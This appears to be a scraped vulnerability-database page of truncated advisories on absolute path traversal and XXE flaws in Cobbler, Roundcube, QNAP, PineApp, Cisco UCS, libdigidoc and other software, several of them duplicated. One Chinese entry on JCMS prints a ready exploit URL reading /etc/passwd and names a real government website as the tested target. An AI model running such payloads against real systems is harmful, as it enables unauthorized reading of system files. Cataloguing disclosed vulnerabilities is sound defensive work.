Path traversal

Absolute path traversal vulnerability in the web interface in Cobbler 2.4.x through 2.6.x allows remote authenticated users to read arbitrary files via the Kickstart field in a profile...

UBUNTU-CVE-2014-3225

Absolute path traversal vulnerability in the web interface in Cobbler 2.4.x through 2.6.x allows remote authenticated users to read arbitrary files via the Kickstart field in a profile...

CVE-2014-2863

CVE-2014-2863 describes multiple absolute path traversal vulnerabilities in PaperThin CommonSpot reported for versions before 7.0.2 and 8.x before 8.0.3. The flaw allows remote attackers to cause an unspecified impact by supplying a full pathname in a parameter. The connected documents corroborat...

大汉网络JCMS任意文件下载

简要描述： 绝对路径文件下载的问题。 详细说明： 通过分析代码，某个下载功能没有限制权限，没有限制下载类型，通过设置绝对路径的参数，直接下载。 漏洞利用： jcms\m19\user\down.jsp?abspathfile=/etc/passwd 漏洞证明： 测试代码： http://www.njgl.gov.cn/jcms/m19/user/down.jsp?abspathfile=/etc/passwd 鼓楼区政府门户网站： 下载文件内容：...

Path traversal

Absolute path traversal vulnerability in steps/mail/sendmail.inc in Roundcube Webmail before 0.7.3 and 0.8.x before 0.8.6 allows remote attackers to read arbitrary files via a full pathname in the value parameter for the genericmessagefooter setting in a save-perf action to index.php, as exploite...

Path traversal

Absolute path traversal vulnerability in cantata before 1.2.2 allows local users to read arbitrary files via a full pathname in a request to the internal httpd server. NOTE: this vulnerability can be leveraged by remote attackers using CVE-2013-7301...

CVE-2013-7300

Absolute path traversal vulnerability in cantata before 1.2.2 allows local users to read arbitrary files via a full pathname in a request to the internal httpd server. NOTE: this vulnerability can be leveraged by remote attackers using CVE-2013-7301...

CVE-2013-7140

XML External Entity XXE vulnerability in the CalDAV interface in Open-Xchange OX AppSuite 7.4.1 and earlier allows remote authenticated users to read portions of arbitrary files via vectors related to the SAX builder and the WebDAV interface. NOTE: this issue has been labeled as both absolute pat...

Path traversal

XML External Entity XXE vulnerability in the CalDAV interface in Open-Xchange OX AppSuite 7.4.1 and earlier allows remote authenticated users to read portions of arbitrary files via vectors related to the SAX builder and the WebDAV interface. NOTE: this issue has been labeled as both absolute pat...

CVE-2013-7140

XML External Entity XXE vulnerability in the CalDAV interface in Open-Xchange OX AppSuite 7.4.1 and earlier allows remote authenticated users to read portions of arbitrary files via vectors related to the SAX builder and the WebDAV interface. NOTE: this issue has been labeled as both absolute pat...

CVE-2013-7140

Open-Xchange AppSuite 7.4.1 and earlier is affected by an XML External Entity (XXE) vulnerability in the CalDAV interface (SAX builder and WebDAV). The issue can allow remote authenticated users to read portions of arbitrary files on the server. The root cause is characterized as XXE (and may inc...

CVE-2013-7174

CVE-2013-7174 affects QNAP QTS prior to 4.1.0, via path traversal in the CGI script cgi-bin/jc.cgi . An unauthenticated remote attacker can read arbitrary files by supplying a full pathname in parameter f . The vulnerability is classified with base CVSS v2 score 7.8 (HIGH) under attack vector NET...

PineApp Mail-SeCure Absolute Path Traversal Vulnerability

PineApp Mail-SeCure appliance is prone to absolute path traversal vulnerability. SPDX-FileCopyrightText: 2013 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2013-6827

CVE-2013-6827 affects PineApp Mail-SeCure appliances, with an absolute path traversal in the admin/viewmsg.php endpoint. The vulnerability allows an attacker to read arbitrary files by supplying a full pathname in the msg parameter. The issue is confirmed by multiple feeds in the connected docume...

EC-CUBE information disclosure vulnerability

Overview EC-CUBE from LOCKON CO.,LTD. is an open source system for creating shopping websites. EC-CUBE contains an information disclosure vulnerability. Gen Sato reported this vulnerability to the developer. JPCERT/CC coordinated with the developer under Information Security Early Warning...

CVE-2012-4104

CVE-2012-4104 affects Cisco UCS Fabric Interconnect’s image-download process, enabling absolute path traversal via a header-defined storage location. The underlying issue allows a local authenticated attacker to overwrite or delete arbitrary files on the filesystem by supplying a crafted image he...

Amazon Linux AMI : php (ALAS-2011-07)

The MITRE CVE database describes these CVEs as : Revert isa behavior to php = 5.3.6 and add a new new option allowstring for the new behavior accept string and raise autoload if needed Use-after-free vulnerability in the substrreplace function in PHP 5.3.6 and earlier allows context-dependent...

CVE-2013-5648

Absolute path traversal vulnerability in the handleStartDataFile function in DigiDocSAXParser.c in libdigidoc 3.6.0.0, as used in ID-software before 3.7.2 and other products, allows remote attackers to overwrite arbitrary files via a filename beginning with / slash or \ backslash in a DDOC file...

Path traversal

Absolute path traversal vulnerability in the handleStartDataFile function in DigiDocSAXParser.c in libdigidoc 3.6.0.0, as used in ID-software before 3.7.2 and other products, allows remote attackers to overwrite arbitrary files via a filename beginning with / slash or \ backslash in a DDOC file...

CVE-2013-5648

Affected software: libdigidoc (library) 3.6.0.0 used by ID-software before 3.7.2; component: DigiDocSAXParser.c (handleStartDataFile); vulnerability type: absolute path traversal. Root cause: unvalidated filename beginning with / or \ in a DDOC file allows remote attackers to overwrite arbitrary ...